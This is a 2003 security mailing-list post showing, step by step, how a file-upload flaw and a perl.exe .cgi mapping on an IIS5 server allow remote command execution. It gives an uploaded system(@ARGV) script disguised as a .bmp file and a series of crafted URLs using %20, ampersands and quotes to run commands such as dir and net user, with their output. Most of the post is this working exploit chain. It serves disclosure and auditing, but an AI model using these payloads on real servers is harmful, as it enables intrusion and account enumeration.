The Building Of An Exploit String

From: Brett Moore <brett(at)softwarecreations.co.nz>
Date: Wed Feb 26 2003 - 21:01:04 EST

---

The Building Of An Exploit String
- Exploiting The PERL Under IIS

---

PERL v5.6.1 built for MSWin32-x86
*http://www.perl.com/
*http://www.activestate.com

The problems highlighted in this writeup are not directly related to the use of perl but highlight some of the possibilities when problems with file uploading and directory permissions are abused. It is highly possible that these techniques could be used against other command
line interpreters.

I recently audited a package that used the perl.exe interpreter on a windows 2000 server running IIS5.

Under application configuration in the IIS management console, the .cgi extension
is mapped as: c:/APP/perl/bin/perl.exe %s

This allows us access to the perl executable through the use of a cgi extension.

example: *http://192.168.1.1/web/test.cgi returns: Can't open perl script "C:\APP\web\test.cgi": No such file or directory

This is obviously a path disclosure issue.

All attempts to pass parameters to perl.exe fail.

example: *http://192.168.1.1/web/-h.cgi
result: Can't open perl script "C:\APP\web\-h.cgi": No such file or directory

It seems that IIS is passing the full path to the interpreter.

So what we required was the ability to create a file on the server and then pass
that file to the perl interpreter.

This particular application allowed uploading of files with a .bmp extension so
we created a small perl script

        system(@ARGV);

and uploaded it as system.bmp. This file was uploaded to the folder

        c:/APP/web/data/

IIS will only pass the file to the perl interpreter if it has a cgi extension,
which our uploaded file doesn't have.

example: *http://192.168.1.1/web/data/system.bmp.cgi result: Can't open perl script "C:\APP\web\data\system.bmp.cgi":

        No such file or directory

By placing a %20 (space) or %09 (tab) between the .bmp and the .cgi we are able to force the interpreter to execute our script.

example: *http://192.168.1.1/web/data/system.bmp%20.cgi result: '.cgi' is not recognized as an internal or external command,

         operable program or batch file.

The system command inside our uploaded file is executing and using the .cgi as the argv parameter.

Any arguments placed before the %20.cgi will be used by our system call.

example: *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi result: This will result in a request to open or save to disk

Appending a ? to the end of the url will prevent the open/save to disk request.

example: *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi? result: Directory of C:\APP\web

         File Not Found

This results in a File Not Found message because our script is running

        system("dir .cgi?")

This is easily avoided by inserting an & (ampersand) character after the last argument and before the %20.cgi

example: *http://192.168.1.1/web/data/system.bmp%20dir%20&%20.cgi? result:

        Directory of C:\APP\web

	02/12/2003  09:21a                .
	02/12/2003  09:21a                ..
	02/12/2003  01:35a                  15 a.pl
	02/12/2003  12:36a                bin
	02/12/2003  12:36a                 206 default.htm
	etc..
              10 File(s)         17,165 bytes
               6 Dir(s)  52,390,678,528 bytes free
	'.cgi' is not recognized as an internal or external command,
	operable program or batch file.

Which will now run as system("dir & .cgi?") which are interpreted by cmd.exe as
two seperate dos commands.

This will not work when attempting to run executable files.

example: *http://192.168.1.1/web/data/system.bmp%20net%20user%20&%20%20.cgi? result: More help is available by typing NET HELPMSG 2221.

example: *http://192.168.1.1/web/data/system.bmp%20net%20use%20&%20%20.cgi? result: The network name cannot be found.

This is caused by cmd.exe interpreting the 'user & .cgi' part of the string as the parameter to pass to 'net.exe'. This results in a call to  "net user & .cgi" which is invalid.

By placing " (double quotes) around our net.exe call we can modify the way that cmd.exe will interpret the string.

example:
*http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20%20.cgi?

result:	------------------------------------------------------------
	Administrator            Guest                    IUSR_BLACKHOLE
	IWAM_BLACKHOLE           NetShowServices          TsInternetUser
	VUSR_BLACKHOLE
	The command completed with one or more errors.


	'.cgi' is not recognized as an internal or external command,
	operable program or batch file.

The '.cgi' error is still been shown here as it is still been interpreted. By adding a final command and redirecting its output to a writable file space
we can have this error removed.

example:
*http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\a.cg
i?

result:	------------------------------------------------------------
	Administrator            Guest                    IUSR_BLACKHOLE
	IWAM_BLACKHOLE           NetShowServices          TsInternetUser
	VUSR_BLACKHOLE
	The command completed with one or more errors.

..

---

<Pre>Do you know the base address of the Global Offset Table (GOT) on a Solaris 8 box? CORE IMPACT does.</Pre>
<A href="http://www.securityfocus.com/core"> http://www.securityfocus.com/core</A> Received on Thu Feb 27 12:36:56 2003